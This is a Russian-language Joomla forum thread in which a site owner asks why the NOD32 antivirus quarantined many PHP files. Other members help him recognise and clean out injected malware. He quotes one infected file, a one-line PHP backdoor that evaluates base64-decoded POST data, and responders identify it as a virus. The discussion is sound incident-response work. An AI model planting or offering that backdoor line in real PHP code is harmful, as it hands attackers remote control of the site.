Почему NOD32 отправляет некоторые файлы php в карантин, а некоторые нет? - Joomla 2.5: Установка и обновление

начал распаковывать архив скаченный с хоста то половина файлов php попали в карантин с сообщением PHP/Kriptik.AL троянская программа..., в инете кто что пишет, кто пишет, что антивирусники если видят 64 й код, то сразу в карантин, не раскодируя, другие, что лучше удалить..., кто что посоветует?

Стандарт- антивирус выявил файл с вредоносным кодом.Но код может быть вставлен в нормальный скрипт Joomla/расширения. Поэтому, чтобы сохранить работоспособность сайта, нужно каждый файл сравнивать или заменять, с аналогичным из чистого дистра Joomla.
Или если есть опыт, самостоятельно проверять файл и удалять вредоносный код.

1.Не качайте с хоста, есть сайты разработчиков.Вот почему вы верите вашему хосту, а потом темы такие создаёте?
2.Отключите НОД и в нотепаге++ в поиске найдите ваш код

Я проверил ссылку на сайт д.вебом он лайн, чисто, на хосте антивирусником, тоже чисто, и поэтому немного непонятно, какие должны быть правильные действия..., например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
Joomla я скачал с сайта разработчика, и что я должен проверить каждый файл на base64 и раскодировать?
не могу понять, что сделал не так и что надо сделать? т.к. я ничего не откуда не качал кроме Joomla...
PS: Файлов в карантине больше 100 и каждый проверять и раскодировать ..сложновато...

Или учится самому http://joomlaforum.ru/index.php?topic=239756.0  как убирать вредоносный код или обращаться к специалистам http://joomlaforum.ru/index.php/topic,282477.0.htmlhttp://joomlaforum.ru/index.php/topic,254903.0.html

спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...

спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...

По одной строчке сложно сказать, но скорее всего вирус. Посмотрите логи, htaccess прогоните сканером. Тогда будет более понятно

Понял, однозначного ответа нет, надо смотреть...блин, но с каждым ответом появляются другие вопросы...
Если это может быть не вирус, следовательно это может быть кусок кода программы... Каким образом этот код предстал в таком виде?, из-за какого-нибудь конвертера или ещё как...
Надо ли этот код переконвертировать обратно в обычный код и как это делается(хотя бы  ссылку почитать)
Каким сканером прогонять .htaccess(он у меня в таком виде), т.к. артивирусники ничего плохого в нем не увидели, может это Неправильные антивирусники, и для htaccess, нужен особый сканер...вот этот файл, что в нем может быть опасного...


И последнее какие логи смотреть, в какой папке и на предмет чего.... посмотреть то посмотрю, но какие строчки в нем искать непонятно... что должно вызвать подозрительность при просмотре логов...
во ещё один файл нашел по пути ....ru\administrator\components\com_joomlapack\backup\.htaccess
deny from all

например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>

это вирус.Такой код  в файле дописан или просто файл

Сканер http://joomlaforum.ru/index.php/topic,198048.0.html Поищите по форуму сканеров много
Логи смотрите последние, откуда идут подозрительные движения. Например попытка доступа к админ части. Но логи могут не давать полной картины, если взлом произошёл давно.
Под спойлером стандартный htaccess сравнивайте

спасибо, буду смотреть..., а htaccess, что у вас в спулере, что у меня в спулере идентичны...

Проверяйте этот \administrator\components\com_joomlapack\backup\.htaccess

А что его проверять, выше я написал, что там одна строчка...
deny from all
Запретить всем.... А должно быть так или нет... я не знаю...